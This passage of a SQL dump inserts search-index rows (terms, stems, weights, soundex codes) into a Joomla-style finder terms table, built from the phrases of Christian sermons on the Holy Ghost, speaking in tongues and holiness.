(266542, 'holy ghost is', 'holi ghost is', 0, 1, 1.4333, 'H4232', 1, '*'),
(266543, 'holy ghost move', 'holi ghost move', 0, 1, 1.5, 'H42351', 1, '*'),
(266544, 'holy ghost receive', 'holi ghost receive', 0, 1, 1.6, 'H423621', 1, '*'),
(266545, 'holy ghost the', 'holi ghost the', 0, 1, 1.4667, 'H423', 2, '*'),
(266546, 'how to receive', 'how to receive', 0, 1, 1.4667, 'H3621', 1, '*'),
(266547, 'i e you', 'i e you', 0, 1, 1.2333, 'I000', 1, '*'),
(266548, 'if he doesn\'t', 'if he doesn', 0, 1, 1.4333, 'I13253', 1, '*'),
(266549, 'if the lord', 'if the lord', 0, 1, 1.3667, 'I13463', 1, '*'),
(266550, 'immediately', 'immedi', 0, 0, 0.7333, 'I534', 1, '*'),
(266551, 'immediately encourage', 'immedi encourage', 0, 1, 1.7, 'I5345262', 1, '*'),
(266552, 'immediately encourage him', 'immedi encourage him', 0, 1, 1.8333, 'I53452625', 1, '*'),
(266553, 'in a fast', 'in a fast', 0, 1, 1.3, 'I5123', 1, '*'),
(266554, 'in tongues don\'t', 'in tongues don', 0, 1, 1.5333, 'I5352353', 1, '*'),
(266555, 'in tongues let', 'in tongues let', 0, 1, 1.4667, 'I535243', 1, '*'),
(266556, 'in tongues which', 'in tongues which', 0, 1, 1.5333, 'I5352', 1, '*'),
(266557, 'is meant', 'is meant', 0, 1, 1.2667, 'I253', 1, '*'),
(266558, 'is meant for', 'is meant for', 0, 1, 1.4, 'I25316', 1, '*'),
(266559, 'is not yet', 'is not yet', 0, 1, 1.3333, 'I253', 1, '*'),
(266560, 'is the evidence', 'is the evidence', 0, 1, 1.5, 'I231352', 1, '*'),
(266561, 'is the holy', 'is the holy', 0, 1, 1.3667, 'I234', 1, '*'),
(266562, 'item 9', 'item 9', 0, 1, 1.2, 'I350', 1, '*'),
(266563, 'item 9 how', 'item 9 how', 0, 1, 1.3333, 'I350', 1, '*'),
(266564, 'john 14', 'john 14', 0, 1, 1.2333, 'J500', 1, '*'),
(266565, 'john 14 16', 'john 14 16', 0, 1, 1.3333, 'J500', 1, '*'),
(266566, 'k2 item 9', 'k2 item 9', 0, 1, 1.3, 'K350', 1, '*'),
(266567, 'keep applying', 'keep applying', 0, 1, 1.4333, 'K1452', 1, '*'),
(266568, 'keep applying faith', 'keep applying faith', 0, 1, 1.6333, 'K145213', 1, '*'),
(266569, 'lastly encourage', 'lastli encourage', 0, 1, 1.5333, 'L2345262', 1, '*'),
(266570, 'lastly encourage him', 'lastli encourage him', 0, 1, 1.6667, 'L23452625', 1, '*'),
(266571, 'laying', 'lai', 0, 0, 0.4, 'L520', 1, '*'),
(266572, 'laying his', 'lai his', 0, 1, 1.3333, 'L520', 1, '*'),
(266573, 'laying his hands', 'lai his hands', 0, 1, 1.5333, 'L52532', 1, '*'),
(266574, 'laying on', 'lai on', 0, 1, 1.3, 'L525', 1, '*'),
(266575, 'laying on of', 'lai on of', 0, 1, 1.4, 'L5251', 1, '*'),
(266576, 'let him study', 'let him study', 0, 1, 1.4333, 'L3523', 1, '*'),
(266577, 'life came', 'life came', 0, 1, 1.3, 'L125', 1, '*'),
(266578, 'life came against', 'life came against', 0, 1, 1.5667, 'L1252523', 1, '*'),
(266579, 'lord tarries', 'lord tarries', 0, 1, 1.4, 'L6362', 1, '*'),
(266580, 'lord tarries read', 'lord tarries read', 0, 1, 1.5667, 'L636263', 1, '*'),
(266581, 'manifestation', 'manifest', 0, 0, 0.8667, 'M1235', 3, '*'),
(266582, 'manifestation for', 'manifest for', 0, 1, 1.5667, 'M123516', 1, '*'),
(266583, 'manifestation for holy', 'manifest for holy', 0, 1, 1.7333, 'M1235164', 1, '*'),
(266584, 'meaneth', 'meaneth', 0, 0, 0.4667, 'M300', 1, '*'),
(266585, 'meaneth this', 'meaneth this', 0, 1, 1.4, 'M320', 1, '*'),
(266586, 'meaneth this don\'t', 'meaneth this don', 0, 1, 1.6, 'M32353', 1, '*'),
(266587, 'meant', 'meant', 0, 0, 0.3333, 'M300', 1, '*'),
(266588, 'meant for', 'meant for', 0, 1, 1.3, 'M316', 1, '*'),
(266589, 'meant for you', 'meant for you', 0, 1, 1.4333, 'M316', 1, '*'),
(266590, 'minister holy', 'minist holy', 0, 1, 1.4333, 'M2364', 1, '*'),
(266591, 'minister holy ghost', 'minist holy ghost', 0, 1, 1.6333, 'M236423', 1, '*'),
(266592, 'minister of god', 'minist of god', 0, 1, 1.5, 'M236123', 1, '*'),
(266593, 'mistake', 'mistak', 0, 0, 0.4667, 'M232', 1, '*'),
(266594, 'mistake a', 'mistak a', 0, 1, 1.3, 'M232', 1, '*'),
(266595, 'mistake a demonic', 'mistak a demonic', 0, 1, 1.5667, 'M232352', 1, '*'),
(266596, 'move don\'t', 'move don', 0, 1, 1.3333, 'M1353', 1, '*'),
(266597, 'move don\'t get', 'move don get', 0, 1, 1.4667, 'M135323', 1, '*'),
(266598, 'not yet', 'not yet', 0, 1, 1.2333, 'N300', 1, '*'),
(266599, 'not yet born', 'not yet born', 0, 1, 1.4, 'N3165', 1, '*'),
(266600, 'noted', 'note', 0, 0, 0.3333, 'N300', 1, '*'),
(266601, 'noted that', 'note that', 0, 1, 1.3333, 'N300', 1, '*'),
(266602, 'noted that the', 'note that the', 0, 1, 1.4667, 'N300', 1, '*'),
(266603, 'now and for', 'now and for', 0, 1, 1.3667, 'N316', 1, '*'),
(266604, 'of a servant', 'of a servant', 0, 1, 1.4, 'O126153', 1, '*'),
(266605, 'of god a', 'of god a', 0, 1, 1.2667, 'O123', 1, '*'),
(266606, 'of god minister', 'of god minister', 0, 1, 1.5, 'O1235236', 1, '*'),
(266607, 'of hands', 'of hands', 0, 1, 1.2667, 'O1532', 1, '*'),
(266608, 'of hands of', 'of hands of', 0, 1, 1.3667, 'O15321', 1, '*'),
(266609, 'of life came', 'of life came', 0, 1, 1.4, 'O14125', 1, '*'),
(266610, 'of prayer', 'of prayer', 0, 1, 1.3, 'O160', 1, '*'),
(266611, 'of prayer i', 'of prayer i', 0, 1, 1.3667, 'O160', 1, '*'),
(266612, 'of “what', 'of “what', 0, 1, 1.2667, 'O130', 1, '*'),
(266613, 'of “what meaneth', 'of “what meaneth', 0, 1, 1.5333, 'O1353', 1, '*'),
(266614, 'on of', 'on of', 0, 1, 1.1667, 'O510', 1, '*'),
(266615, 'on of hands', 'on of hands', 0, 1, 1.3667, 'O51532', 1, '*'),
(266616, 'on you and', 'on you and', 0, 1, 1.3333, 'O530', 1, '*'),
(266617, 'own tongues', 'own tongues', 0, 1, 1.3667, 'O5352', 1, '*'),
(266618, 'own tongues don\'t', 'own tongues don', 0, 1, 1.5667, 'O5352353', 1, '*'),
(266619, 'personally desire', 'person desire', 0, 1, 1.5667, 'P6254326', 1, '*'),
(266620, 'personally desire him', 'person desire him', 0, 1, 1.7, 'P62543265', 1, '*'),
(266621, 'place of prayer', 'place of prayer', 0, 1, 1.5, 'P4216', 1, '*'),
(266622, 'power of god', 'power of god', 0, 1, 1.4, 'P6123', 1, '*'),
(266623, 'pray for him', 'prai for him', 0, 1, 1.4, 'P6165', 1, '*'),
(266624, 'prayer i', 'prayer i', 0, 1, 1.2667, 'P600', 1, '*'),
(266625, 'prayer i e', 'prayer i e', 0, 1, 1.3333, 'P600', 1, '*'),
(266626, 'praying for you', 'prai for you', 0, 1, 1.5, 'P65216', 1, '*'),
(266627, 'promise is', 'promis is', 0, 1, 1.3333, 'P652', 1, '*'),
(266628, 'promise is for', 'promis is for', 0, 1, 1.4667, 'P65216', 1, '*'),
(266629, 'promise of', 'promis of', 0, 1, 1.3333, 'P6521', 1, '*'),
(266630, 'promise of the', 'promis of the', 0, 1, 1.4667, 'P65213', 1, '*'),
(266631, 'read acts', 'read acts', 0, 1, 1.3, 'R3232', 1, '*'),
(266632, 'read acts 19', 'read acts 19', 0, 1, 1.4, 'R3232', 1, '*'),
(266633, 'receive holy', 'receiv holy', 0, 1, 1.4, 'R214', 1, '*'),
(266634, 'receive holy ghost', 'receiv holy ghost', 0, 1, 1.6, 'R21423', 1, '*'),
(266635, 'receive the holy', 'receiv the holy', 0, 1, 1.5333, 'R2134', 1, '*'),
(266636, 'same storms', 'same storms', 0, 1, 1.3667, 'S523652', 1, '*'),
(266637, 'same storms of', 'same storms of', 0, 1, 1.4667, 'S5236521', 1, '*'),
(266638, 'servant of', 'servant of', 0, 1, 1.3333, 'S61531', 1, '*'),
(266639, 'servant of god', 'servant of god', 0, 1, 1.4667, 'S6153123', 1, '*'),
(266640, 'should be noted', 'should be noted', 0, 1, 1.5, 'S43153', 1, '*'),
(266641, 'sinner one', 'sinner one', 0, 1, 1.3333, 'S565', 1, '*'),
(266642, 'sinner one that', 'sinner one that', 0, 1, 1.5, 'S5653', 1, '*'),
(266643, 'speak immediately', 'speak immediately', 0, 1, 1.5667, 'S12534', 1, '*'),
(266644, 'speak immediately encourage', 'speak immediately encourage', 0, 1, 1.9, 'S125345262', 1, '*'),
(266645, 'speaking the', 'speak the', 0, 1, 1.4, 'S12523', 1, '*'),
(266646, 'speaking the words', 'speak the words', 0, 1, 1.6, 'S12523632', 1, '*'),
(266647, 'start speaking the', 'start speaking the', 0, 1, 1.6, 'S363212523', 1, '*'),
(266648, 'storms', 'storm', 0, 0, 0.4, 'S3652', 1, '*'),
(266649, 'storms of', 'storm of', 0, 1, 1.3, 'S36521', 1, '*'),
(266650, 'storms of life', 'storm of life', 0, 1, 1.4667, 'S3652141', 1, '*'),
(266651, 'study 1', 'studi 1', 0, 1, 1.2333, 'S300', 1, '*'),
(266652, 'study 1 cor', 'studi 1 cor', 0, 1, 1.3667, 'S326', 1, '*'),
(266653, 'tarries', 'tarri', 0, 0, 0.4667, 'T620', 1, '*'),
(266654, 'tarries read', 'tarri read', 0, 1, 1.4, 'T6263', 1, '*'),
(266655, 'tarries read acts', 'tarri read acts', 0, 1, 1.5667, 'T6263232', 1, '*'),
(266656, 'teach him', 'teach him', 0, 1, 1.3, 'T250', 1, '*'),
(266657, 'teach him your', 'teach him your', 0, 1, 1.4667, 'T256', 1, '*'),
(266658, 'that are coming', 'that are coming', 0, 1, 1.5, 'T6252', 1, '*'),
(266659, 'that the promise', 'that the promise', 0, 1, 1.5333, 'T1652', 1, '*'),
(266660, 'that the same', 'that the same', 0, 1, 1.4333, 'T250', 1, '*'),
(266661, 'the believer has', 'the believer has', 0, 1, 1.5333, 'T14162', 1, '*'),
(266662, 'the evidence', 'the evidence', 0, 1, 1.4, 'T1352', 1, '*'),
(266663, 'the evidence of', 'the evidence of', 0, 1, 1.5, 'T13521', 1, '*'),
(266664, 'the lord tarries', 'the lord tarries', 0, 1, 1.5333, 'T46362', 1, '*'),
(266665, 'the promise is', 'the promise is', 0, 1, 1.4667, 'T1652', 1, '*'),
(266666, 'the promise of', 'the promise of', 0, 1, 1.4667, 'T16521', 1, '*'),
(266667, 'the same storms', 'the same storms', 0, 1, 1.5, 'T2523652', 1, '*'),
(266668, 'the unbeliever', 'the unbeliever', 0, 1, 1.4667, 'T51416', 1, '*'),
(266669, 'the unbeliever but', 'the unbeliever but', 0, 1, 1.6, 'T5141613', 1, '*'),
(266670, 'the words as', 'the words as', 0, 1, 1.4, 'T632', 1, '*'),
(266671, 'then pray', 'then pray', 0, 1, 1.3, 'T516', 1, '*'),
(266672, 'then pray for', 'then pray for', 0, 1, 1.4333, 'T51616', 1, '*'),
(266673, 'they come don\'ts', 'thei come don', 0, 1, 1.5333, 'T253532', 1, '*'),
(266674, 'this don\'t', 'thi don', 0, 1, 1.3333, 'T2353', 1, '*'),
(266675, 'this don\'t minister', 'thi don minister', 0, 1, 1.6333, 'T23535236', 1, '*'),
(266676, 'to a sinner', 'to a sinner', 0, 1, 1.3667, 'T256', 1, '*'),
(266677, 'to come upon', 'to come upon', 0, 1, 1.4, 'T2515', 1, '*'),
(266678, 'to keep applying', 'to keep applying', 0, 1, 1.5333, 'T21452', 1, '*'),
(266679, 'to receive holy', 'to receive holy', 0, 1, 1.5, 'T6214', 1, '*'),
(266680, 'to speaking', 'to speaking', 0, 1, 1.3667, 'T21252', 1, '*'),
(266681, 'to speaking in', 'to speaking in', 0, 1, 1.4667, 'T212525', 1, '*'),
(266682, 'to start speaking', 'to start speaking', 0, 1, 1.5667, 'T236321252', 1, '*'),
(266683, 'to understand', 'to understand', 0, 1, 1.4333, 'T5362353', 2, '*'),
(266684, 'to understand that', 'to understand that', 0, 1, 1.6, 'T5362353', 1, '*'),
(266685, 'tongues don\'t', 'tongu don', 0, 1, 1.4333, 'T52353', 1, '*'),
(266686, 'tongues don\'t equal', 'tongu don equal', 0, 1, 1.6333, 'T5235324', 1, '*'),
(266687, 'tongues don\'t mistake', 'tongu don mistake', 0, 1, 1.7, 'T523535232', 1, '*'),
(266688, 'tongues let', 'tongu let', 0, 1, 1.3667, 'T5243', 1, '*'),
(266689, 'tongues let him', 'tongu let him', 0, 1, 1.5, 'T52435', 1, '*'),
(266690, 'tongues which', 'tongu which', 0, 1, 1.4333, 'T520', 1, '*'),
(266691, 'tongues which is', 'tongu which is', 0, 1, 1.5333, 'T520', 1, '*'),
(266692, 'unbeliever but', 'unbeliev but', 0, 1, 1.4667, 'U5141613', 1, '*'),
(266693, 'unbeliever but the', 'unbeliev but the', 0, 1, 1.6, 'U5141613', 1, '*'),
(266694, 'upon you', 'upon you', 0, 1, 1.2667, 'U150', 2, '*'),
(266695, 'upon you and', 'upon you and', 0, 1, 1.4, 'U153', 1, '*'),
(266696, 'way to speaking', 'wai to speaking', 0, 1, 1.5, 'W321252', 1, '*'),
(266697, 'words as they', 'word as they', 0, 1, 1.4333, 'W6323', 1, '*'),
(266698, 'yet born', 'yet born', 0, 1, 1.2667, 'Y3165', 1, '*'),
(266699, 'yet born again', 'yet born again', 0, 1, 1.4667, 'Y316525', 1, '*'),
(266700, 'yielding', 'yield', 0, 0, 0.5333, 'Y4352', 1, '*'),
(266701, 'yielding yourself', 'yield yourself', 0, 1, 1.5667, 'Y43526241', 1, '*'),
(266702, 'yielding yourself to', 'yield yourself to', 0, 1, 1.6667, 'Y435262413', 1, '*'),
(266703, 'you acts', 'you acts', 0, 1, 1.2667, 'Y232', 1, '*'),
(266704, 'you acts 19', 'you acts 19', 0, 1, 1.3667, 'Y232', 1, '*'),
(266705, 'you and praying', 'you and praying', 0, 1, 1.5, 'Y531652', 1, '*'),
(266706, 'you and you', 'you and you', 0, 1, 1.3667, 'Y530', 1, '*'),
(266707, 'you by laying', 'you by laying', 0, 1, 1.4333, 'Y1452', 1, '*'),
(266708, 'you if the', 'you if the', 0, 1, 1.3333, 'Y130', 1, '*'),
(266709, 'you now', 'you now', 0, 1, 1.2333, 'Y500', 1, '*'),
(266710, 'you now and', 'you now and', 0, 1, 1.3667, 'Y530', 1, '*'),
(266711, 'you personally desire', 'you personally desire', 0, 1, 1.7, 'Y16254326', 1, '*'),
(266712, 'you will begin', 'you will begin', 0, 1, 1.4667, 'Y4125', 1, '*'),
(266713, 'your children acts', 'your children acts', 0, 1, 1.6, 'Y624365232', 1, '*'),
(266714, 'your own tongues', 'your own tongues', 0, 1, 1.5333, 'Y65352', 1, '*'),
(266715, 'yourself to the', 'yourself to the', 0, 1, 1.5, 'Y62413', 1, '*'),
(266716, '“what meaneth', '“what meaneth', 0, 1, 1.4333, '“353', 1, '*'),
(266717, '“what meaneth this', '“what meaneth this', 0, 1, 1.6, '“3532', 1, '*'),
(266852, 'anger', 'anger', 0, 0, 0.3333, 'A526', 4, '*'),
(267338, '\'to', 'to', 0, 0, 0.2, 'T000', 1, '*'),
(267339, '\'to touch', 'to touch', 0, 1, 1.3, 'T200', 1, '*'),
(267340, '\'to touch not', 'to touch not', 0, 1, 1.4333, 'T253', 1, '*'),
(267341, '1 10', '1 10', 0, 1, 1.1333, '', 1, '*'),
(267342, '1 10 in', '1 10 in', 0, 1, 1.2333, 'I500', 1, '*'),
(267343, '1 17-18', '1 17-18', 0, 1, 1.2333, '', 1, '*'),
(267344, '1 17-18 2thes', '1 17-18 2thes', 0, 1, 1.4333, 'T200', 1, '*'),
(267345, '1 7-9', '1 7-9', 0, 1, 1.1667, '', 1, '*'),
(267346, '1 7-9 acts', '1 7-9 acts', 0, 1, 1.3333, 'A232', 1, '*'),
(267347, '1 9-11', '1 9-11', 0, 1, 1.2, '', 1, '*'),
(267348, '1 9-11 “and', '1 9-11 “and', 0, 1, 1.3667, '“530', 1, '*'),
(267349, '1 cor 1', '1 cor 1', 0, 1, 1.2333, 'C600', 1, '*'),
(267350, '1 john 3', '1 john 3', 0, 1, 1.2667, 'J500', 1, '*'),
(267351, '10 in', '10 in', 0, 1, 1.1667, 'I500', 1, '*'),
(267352, '10 in our', '10 in our', 0, 1, 1.3, 'I560', 1, '*'),
(267353, '12 43', '12 43', 0, 1, 1.1667, '', 1, '*'),
(267354, '12 43 jesus', '12 43 jesus', 0, 1, 1.3667, 'J000', 1, '*'),
(267355, '14 the hope', '14 the hope', 0, 1, 1.3667, 'T100', 1, '*'),
(267356, '17-18 2thes', '17-18 2thes', 0, 1, 1.3667, 'T200', 1, '*'),
(267357, '17-18 2thes 3', '17-18 2thes 3', 0, 1, 1.4333, 'T200', 1, '*'),
(267358, '26-26', '26-26', 0, 0, 0.5, '', 1, '*'),
(267359, '26-26 let', '26-26 let', 0, 1, 1.3, 'L300', 1, '*'),
(267360, '26-26 let every', '26-26 let every', 0, 1, 1.5, 'L316', 1, '*'),
(267361, '2thes', '2the', 0, 0, 0.3333, 'T200', 1, '*'),
(267362, '2thes 3', '2the 3', 0, 1, 1.2333, 'T200', 1, '*'),
(267363, '2thes 3 5', '2the 3 5', 0, 1, 1.3, 'T200', 1, '*'),
(267364, '3 3', '3 3', 0, 1, 1.1, '', 1, '*'),
(267365, '3 3 amp', '3 3 amp', 0, 1, 1.2333, 'A510', 1, '*'),
(267366, '3 5 living', '3 5 living', 0, 1, 1.3333, 'L152', 1, '*'),
(267367, '3 amp', '3 amp', 0, 1, 1.1667, 'A510', 1, '*'),
(267368, '3 amp everyone', '3 amp everyone', 0, 1, 1.4667, 'A5165', 1, '*'),
(267369, '35-39', '35-39', 0, 0, 0.5, '', 1, '*'),
(267370, '35-39 now', '35-39 now', 0, 1, 1.3, 'N000', 1, '*'),
(267371, '35-39 now if', '35-39 now if', 0, 1, 1.4, 'N100', 1, '*'),
(267372, '43 jesus', '43 jesus', 0, 1, 1.2667, 'J000', 1, '*'),
(267373, '43 jesus is', '43 jesus is', 0, 1, 1.3667, 'J000', 1, '*'),
(267374, '5 26-26', '5 26-26', 0, 1, 1.2333, '', 1, '*'),
(267375, '5 26-26 let', '5 26-26 let', 0, 1, 1.3667, 'L300', 1, '*'),
(267376, '5 living', '5 living', 0, 1, 1.2667, 'L152', 1, '*'),
(267377, '5 living with', '5 living with', 0, 1, 1.4333, 'L1523', 1, '*'),
(267378, '7-9 acts', '7-9 acts', 0, 1, 1.2667, 'A232', 1, '*'),
(267379, '7-9 acts 1', '7-9 acts 1', 0, 1, 1.3333, 'A232', 1, '*'),
(267380, '8 35-39', '8 35-39', 0, 1, 1.2333, '', 1, '*'),
(267381, '8 35-39 now', '8 35-39 now', 0, 1, 1.3667, 'N000', 1, '*'),
(267382, '9-11', '9-11', 0, 0, 0.4, '', 1, '*'),
(267383, '9-11 “and', '9-11 “and', 0, 1, 1.3, '“530', 1, '*'),
(267384, '9-11 “and to', '9-11 “and to', 0, 1, 1.4, '“530', 1, '*'),
(267385, 'a condition that', 'a condition that', 0, 1, 1.5333, 'A25353', 1, '*'),
(267386, 'a glorious church', 'a glorious church', 0, 1, 1.5667, 'A246262', 1, '*'),
(267387, 'a hopeless', 'a hopeless', 0, 1, 1.3333, 'A142', 1, '*'),
(267388, 'a hopeless hope', 'a hopeless hope', 0, 1, 1.5, 'A1421', 1, '*'),
(267389, 'a shadow', 'a shadow', 0, 1, 1.2667, 'A230', 1, '*'),
(267390, 'a shadow of', 'a shadow of', 0, 1, 1.3667, 'A231', 1, '*'),
(267391, 'a standard', 'a standard', 0, 1, 1.3333, 'A235363', 1, '*'),
(267392, 'a standard much', 'a standard much', 0, 1, 1.5, 'A23536352', 1, '*'),
(267393, 'a state he\'s', 'a state he', 0, 1, 1.4, 'A232', 1, '*'),
(267394, 'a way that', 'a way that', 0, 1, 1.3333, 'A300', 1, '*'),
(267395, 'abandoned us', 'abandon us', 0, 1, 1.4, 'A153532', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(267396, 'abandoned us standing', 'abandon us standing', 0, 1, 1.7, 'A15353235352', 1, '*'),
(267397, 'above paul', 'abov paul', 0, 1, 1.3333, 'A140', 1, '*'),
(267398, 'above paul was', 'abov paul was', 0, 1, 1.4667, 'A142', 1, '*'),
(267399, 'acceptable and', 'accept and', 0, 1, 1.4667, 'A2131453', 1, '*'),
(267400, 'acceptable and everyone', 'accept and everyone', 0, 1, 1.7667, 'A2131453165', 1, '*'),
(267401, 'acts 1', 'act 1', 0, 1, 1.2, 'A232', 1, '*'),
(267402, 'acts 1 9-11', 'act 1 9-11', 0, 1, 1.3667, 'A232', 1, '*'),
(267403, 'admonished', 'admonish', 0, 0, 0.6667, 'A3523', 1, '*'),
(267404, 'admonished the', 'admonish the', 0, 1, 1.4667, 'A3523', 1, '*'),
(267405, 'admonished the church', 'admonish the church', 0, 1, 1.7, 'A3523262', 1, '*'),
(267406, 'admonition', 'admonit', 0, 0, 0.6667, 'A3535', 1, '*'),
(267407, 'admonition \'to', 'admonit to', 0, 1, 1.4667, 'A35353', 1, '*'),
(267408, 'admonition \'to touch', 'admonit to touch', 0, 1, 1.6667, 'A353532', 1, '*'),
(267409, 'again jesus', 'again jesus', 0, 1, 1.3667, 'A252', 1, '*'),
(267410, 'again jesus is', 'again jesus is', 0, 1, 1.4667, 'A252', 1, '*'),
(267411, 'all this', 'all this', 0, 1, 1.2667, 'A432', 2, '*'),
(267412, 'all this we', 'all this we', 0, 1, 1.3667, 'A432', 1, '*'),
(267413, 'amp', 'amp', 0, 0, 0.2, 'A510', 1, '*'),
(267414, 'amp everyone', 'amp everyone', 0, 1, 1.4, 'A5165', 1, '*'),
(267415, 'amp everyone that', 'amp everyone that', 0, 1, 1.5667, 'A51653', 1, '*'),
(267416, 'an unbeliever is', 'an unbeliever is', 0, 1, 1.5333, 'A514162', 1, '*'),
(267417, 'and an', 'and an', 0, 1, 1.2, 'A535', 1, '*'),
(267418, 'and an unbeliever', 'and an unbeliever', 0, 1, 1.5667, 'A5351416', 1, '*'),
(267419, 'and cleanse', 'and cleanse', 0, 1, 1.3667, 'A532452', 1, '*'),
(267420, 'and cleanse it', 'and cleanse it', 0, 1, 1.4667, 'A5324523', 1, '*'),
(267421, 'and everyone who', 'and everyone who', 0, 1, 1.5333, 'A53165', 1, '*'),
(267422, 'and he\'s', 'and he', 0, 1, 1.2667, 'A532', 1, '*'),
(267423, 'and he\'s not', 'and he not', 0, 1, 1.4, 'A53253', 1, '*'),
(267424, 'and holiness', 'and holiness', 0, 1, 1.4, 'A53452', 1, '*'),
(267425, 'and holiness demanded', 'and holiness demanded', 0, 1, 1.7, 'A53452353', 1, '*'),
(267426, 'and holiness is', 'and holiness is', 0, 1, 1.5, 'A53452', 1, '*'),
(267427, 'and live pure', 'and live pure', 0, 1, 1.4333, 'A53416', 1, '*'),
(267428, 'and testimony', 'and testimony', 0, 1, 1.4333, 'A53235', 1, '*'),
(267429, 'and testimony of', 'and testimony of', 0, 1, 1.5333, 'A532351', 1, '*'),
(267430, 'and tribulation', 'and tribulation', 0, 1, 1.5, 'A5361435', 1, '*'),
(267431, 'and tribulation there', 'and tribulation there', 0, 1, 1.7, 'A536143536', 1, '*'),
(267432, 'and without blemish', 'and without blemish', 0, 1, 1.6333, 'A531452', 1, '*'),
(267433, 'any such', 'ani such', 0, 1, 1.2667, 'A520', 1, '*'),
(267434, 'any such thing', 'ani such thing', 0, 1, 1.4667, 'A52352', 1, '*'),
(267435, 'are hoping', 'ar hoping', 0, 1, 1.3333, 'A6152', 1, '*'),
(267436, 'are hoping for', 'ar hoping for', 0, 1, 1.4667, 'A615216', 1, '*'),
(267437, 'are not sure', 'ar not sure', 0, 1, 1.4, 'A65326', 1, '*'),
(267438, 'are questions', 'ar questions', 0, 1, 1.4333, 'A62352', 1, '*'),
(267439, 'are questions that', 'ar questions that', 0, 1, 1.6, 'A623523', 1, '*'),
(267440, 'as believers', 'as believers', 0, 1, 1.4, 'A214162', 1, '*'),
(267441, 'as believers there', 'as believers there', 0, 1, 1.6, 'A21416236', 1, '*'),
(267442, 'as he is', 'as he is', 0, 1, 1.2667, 'A200', 1, '*'),
(267443, 'as he left', 'as he left', 0, 1, 1.3333, 'A2413', 1, '*'),
(267444, 'back as', 'back as', 0, 1, 1.2333, 'B200', 1, '*'),
(267445, 'back as he', 'back as he', 0, 1, 1.3333, 'B200', 1, '*'),
(267446, 'back for', 'back for', 0, 1, 1.2667, 'B216', 1, '*'),
(267447, 'back for the', 'back for the', 0, 1, 1.4, 'B2163', 1, '*'),
(267448, 'back for those', 'back for those', 0, 1, 1.4667, 'B21632', 1, '*'),
(267449, 'backsliders', 'backslid', 0, 0, 0.7333, 'B24362', 1, '*'),
(267450, 'backsliders he\'s', 'backslid he', 0, 1, 1.5333, 'B24362', 1, '*'),
(267451, 'backsliders he\'s not', 'backslid he not', 0, 1, 1.6667, 'B2436253', 1, '*'),
(267452, 'be acceptable', 'be acceptable', 0, 1, 1.4333, 'B21314', 1, '*'),
(267453, 'be acceptable and', 'be acceptable and', 0, 1, 1.5667, 'B2131453', 1, '*'),
(267454, 'be glory', 'be glory', 0, 1, 1.2667, 'B246', 1, '*'),
(267455, 'be glory much', 'be glory much', 0, 1, 1.4333, 'B24652', 1, '*'),
(267456, 'be holy', 'be holy', 0, 1, 1.2333, 'B400', 1, '*'),
(267457, 'be holy and', 'be holy and', 0, 1, 1.3667, 'B453', 1, '*'),
(267458, 'be in to', 'be in to', 0, 1, 1.2667, 'B530', 1, '*'),
(267459, 'be tribulation', 'be tribulation', 0, 1, 1.4667, 'B361435', 1, '*'),
(267460, 'be tribulation but', 'be tribulation but', 0, 1, 1.6, 'B36143513', 1, '*'),
(267461, 'because there is', 'becaus there is', 0, 1, 1.5333, 'B2362', 1, '*'),
(267462, 'believers there', 'believ there', 0, 1, 1.5, 'B416236', 1, '*'),
(267463, 'believers there is', 'believ there is', 0, 1, 1.6, 'B4162362', 1, '*'),
(267464, 'between a', 'between a', 0, 1, 1.3, 'B350', 1, '*'),
(267465, 'between a christian', 'between a christian', 0, 1, 1.6333, 'B3526235', 1, '*'),
(267466, 'blemish', 'blemish', 0, 0, 0.4667, 'B452', 1, '*'),
(267467, 'blemish ephesians', 'blemish ephesians', 0, 1, 1.5667, 'B4521252', 1, '*'),
(267468, 'blemish ephesians 5', 'blemish ephesians 5', 0, 1, 1.6333, 'B4521252', 1, '*'),
(267469, 'born out', 'born out', 0, 1, 1.2667, 'B653', 1, '*'),
(267470, 'born out of', 'born out of', 0, 1, 1.3667, 'B6531', 1, '*'),
(267471, 'bring opposition', 'bring opposition', 0, 1, 1.5333, 'B6521235', 1, '*'),
(267472, 'bring opposition and', 'bring opposition and', 0, 1, 1.6667, 'B65212353', 1, '*'),
(267473, 'bring yourself', 'bring yourself', 0, 1, 1.4667, 'B6526241', 1, '*'),
(267474, 'bring yourself into', 'bring yourself into', 0, 1, 1.6333, 'B652624153', 1, '*'),
(267475, 'but in', 'but in', 0, 1, 1.2, 'B350', 2, '*'),
(267476, 'but in all', 'but in all', 0, 1, 1.3333, 'B354', 1, '*'),
(267477, 'but is', 'but is', 0, 1, 1.2, 'B320', 1, '*'),
(267478, 'but is should', 'but is should', 0, 1, 1.4333, 'B3243', 1, '*'),
(267479, 'by the admonition', 'by the admonition', 0, 1, 1.5667, 'B3535', 1, '*'),
(267480, 'by the word', 'by the word', 0, 1, 1.3667, 'B363', 1, '*'),
(267481, 'certainly', 'certainli', 0, 0, 0.6, 'C6354', 1, '*'),
(267482, 'certainly bring', 'certainli bring', 0, 1, 1.5, 'C63541652', 1, '*'),
(267483, 'certainly bring opposition', 'certainli bring opposition', 0, 1, 1.8667, 'C635416521235', 1, '*'),
(267484, 'chaste', 'chast', 0, 0, 0.4, 'C300', 1, '*'),
(267485, 'chaste undefiled', 'chast undefiled', 0, 1, 1.5333, 'C353143', 1, '*'),
(267486, 'chaste undefiled guiltless', 'chast undefiled guiltless', 0, 1, 1.8667, 'C35314324342', 1, '*'),
(267487, 'christ especially', 'christ especially', 0, 1, 1.5667, 'C6232124', 1, '*'),
(267488, 'christ especially in', 'christ especially in', 0, 1, 1.6667, 'C62321245', 1, '*'),
(267489, 'christ gave', 'christ gave', 0, 1, 1.3667, 'C62321', 1, '*'),
(267490, 'christ gave himselffor', 'christ gave himselffor', 0, 1, 1.7333, 'C6232152416', 1, '*'),
(267491, 'christ romans', 'christ romans', 0, 1, 1.4333, 'C623652', 1, '*'),
(267492, 'christ romans 8', 'christ romans 8', 0, 1, 1.5, 'C623652', 1, '*'),
(267493, 'christ s', 'christ s', 0, 1, 1.2667, 'C6232', 1, '*'),
(267494, 'christ s second', 'christ s second', 0, 1, 1.5, 'C623253', 1, '*'),
(267495, 'christ therefore', 'christ therefore', 0, 1, 1.5333, 'C623616', 1, '*'),
(267496, 'christ therefore stand', 'christ therefore stand', 0, 1, 1.7333, 'C6236162353', 1, '*'),
(267497, 'christ this', 'christ this', 0, 1, 1.3667, 'C6232', 1, '*'),
(267498, 'christ this is', 'christ this is', 0, 1, 1.4667, 'C6232', 1, '*'),
